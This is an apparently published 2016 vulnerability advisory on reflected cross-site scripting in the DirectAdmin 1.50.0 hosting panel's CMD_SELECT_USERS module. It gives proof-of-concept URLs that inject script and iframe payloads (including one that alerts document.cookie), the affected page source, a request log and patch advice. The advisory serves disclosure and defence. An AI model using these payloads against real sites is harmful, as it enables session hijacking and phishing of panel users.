Document Title:
===============
Direct Admin v1.50.0 - CS Cross Site Scripting Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1824


Release Date:
=============
2016-04-14


Vulnerability Laboratory ID (VL-ID):
====================================
1824


Common Vulnerability Scoring System:
====================================
3.3


Product & Service Introduction:
===============================
DirectAdmin is a graphical web-based web hosting control panel designed to make administration of websites easier. 
DirectAdmin is often called DA for short. DirectAdmin is compatible with several versions of Red Hat, Fedora Core, 
Red Hat Enterprise Linux, CentOS, FreeBSD, Ubuntu and Debian.

(Copy of the Homepage: https://en.wikipedia.org/wiki/DirectAdmin )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple client-side cross site scripting vulnerabilities in the official Direct Admin v1.50.0 hosting panel web-application.


Vulnerability Disclosure Timeline:
==================================
2016-04-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
JBMC Software
Product: Direct Admin - Hosting Panel (Web-Application 1.50.0


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
Multiple client-side cross site scripting vulnerabilities has been discovered in the official Direct Admin v1.5 Hosting Panel web-application.
The client-side issue allows remote attackers to inject own malicious script code with non-persistent attack vector to compromise browser to 
web-application requests.

The vulnerability is located in the `select1` and `delete` values of the `CMD_SELECT_USERS` module GET method request. Remote attackers are able 
to inject own malicious script code to the client-side of the vulnerable module. The request method to inject is GET and the attack vector of the 
issue is non-persistent. The vulnerability is a classic client-side cross site scripting vulnerability.

The security risk of the client-side cross site vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. 
Exploitation of the non-persistent input validation vulnerabilities requires no privileged web-application user account and low or medium user interaction. 
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious 
source and non-persistent manipulation of affected or connected application modules.


Request Method(s):
				[+] GET

Vulnerable Module(s):
				[+] CMD_SELECT_USERS

Vulnerable Parameter(s):
				[+] select1
				[+] delete


Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without privileged user account and with low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Example
https://localhost:2222/CMD_SELECT_USERS?select1=Site[CLIENT-SIDE CROSS SITE SCRIPTING VULNERABILITY!]&reason=none&delete=Delete&location=CMD_ALL_USER_SHOW
https://localhost:2222/CMD_SELECT_USERS?delete=%3C[CLIENT-SIDE CROSS SITE SCRIPTING VULNERABILITY!]%3EDelete&location=CMD_ALL_USER_SHOW&reason=none&


PoC: Exploitation
https://localhost:2222/CMD_SELECT_USERS?select1=Site'"><script>alert('XSS')</script>&reason=none&delete=Delete&location=CMD_ALL_USER_SHOW
https://localhost:2222/CMD_SELECT_USERS?delete=%3Ciframe%3EDelete&location=CMD_ALL_USER_SHOW&reason=none&select1=Site%3Ca+
onmouseover%3Dhttp%3A%2F%2Fwww.google.de+%3Ch%3Exxs+link%3Ca%3E%3Ciframe+src%3D%22http%3A%2F%2Fwww.google.de%22+onload%3Dalert%28document.cookie%29%3E&
comparison1=none&value1=%22%3E%3Ciframe%3E&sort1dir=1&sort1=1&sort2dir=1&ipp=10


PoC: Vulnerable Source (./CMD_SELECT_USERS?delete=)
<tbody><tr><td colspan="2" align="right"><a class="toptext" href="?view=advanced&amp;sort1=1&amp;comparison%31=
none&amp;delete=%3C[CLIENT-SIDE INJECTED SCRIPT CODE!]%3EDelete&amp;ipp=%31%30&amp;location=CMD%5FALL%5FUSER%5FSHOW&amp;
reason=none&amp;select%31=Site%3Ca%20onmouseover%3Dhttp%3A%2F%2Fwww%2Egoogle%2Ede%20%3Ch%3Exxs%20link%3Ca%3E%3Ciframe%20src
%3D%22http%3A%2F%2Fwww%2Egoogle%2Ede%22%20onload%3Dalert%28document%2Ecookie%29%3E&amp;sort%32dir=%31&amp;value%31=%3Ciframe%3E">Advanced Search</a></td></tr>
<tr><td class="listtitle"><b><a class="listtitle" href="?comparison%31=none&amp;delete=%3C[CLIENT-SIDE INJECTED SCRIPT CODE!]%3EDelete&amp;ipp=%31%30&amp;
location=CMD%5FALL%5FUSER%5FSHOW&amp;reason=none&amp;select%31=Site%3Ca%20[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E&amp;sort%32dir=%31&amp;value%31=%3Ciframe%3E&amp;sort1=-1">User</a></b></td>
<td class="listtitle" align="center"><a class="listtitle" href="javascript:selectAll('select');">Delete</a></td>
</tr>
<tr><td class="list">Site[CLIENT-SIDE INJECTED SCRIPT CODE!]"></td ><td class=list align='center' ><input type='checkbox' name='select0' value="Site<[CLIENT-SIDE INJECTED SCRIPT CODE!]>" checked /></td ></tr >
<tr ><td class=listtitle align='right' colspan='2'> <input type='submit' value='Confirm' name=confirmed> <input type='submit' value='Cancel' name=cancel></td ></tr >
<input type='hidden' name="delete" value="yes" />
</form></table >


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET https://www.directadmin.com:2222/CMD_SELECT_USERS?delete=%3C[CLIENT-SIDE INJECTED SCRIPT CODE!]%3EDelete&location=CMD_ALL_USER_SHOW&reason=none&select1=Site%3Ca+[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E&comparison1=none&value1=%3Ciframe%3E&sort1dir=1&sort1=1&sort2dir=1&ipp=10 Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[www.directadmin.com:2222]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate, br]
      Cookie[session=qy87uxBCdCPu6gqvrASMZ3faagNnA4Nz1T4vQF51RUuV8kQzsqJPrw0SbLDlQbiP]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Server[DirectAdmin Daemon v1.50.0 Registered to JBMC-Software]
      Set-Cookie[session=qy87uxBCdCPu6gqvrASMZ3faagNnA4Nz1T4vQF51RUuV8kQzsqJPrw0SbLDlQbiP; path=/; expires=Thu, 14 Apr 2016 10:04:41 GMT; secure; HttpOnly]
      Connection[close]
      Cache-Control[no-cache]
      Pragma[no-cache]
      Content-Type[text/html]


Reference(s):
http://localhost:2222/CMD_SELECT_USERS?select1=
https://localhost:2222/CMD_SELECT_USERS?delete


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable delete and select1 values in the CMD_SELECT_USERS GET method request.
Disallow usage of special chars and filter the value input to prevent a client-side cross site scripting attack.
Encode in the user listing the output section by implementation of a secure encode or parse mechanism.

Manufacturer Patch Information:
The vulnerability will be stable patched to the next release of direct admin in version 1.6. The pre-release binary package with 
the hotfix can be downloaded via direct admin website portal to today (2016-04-15).


Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerabilities in the web-application are estimated as medium. (CVSS 3.3)


Credits & Authors:
==================
Amir - Iranian Exploit Database (www.iedb.ir)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 				- admin@evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™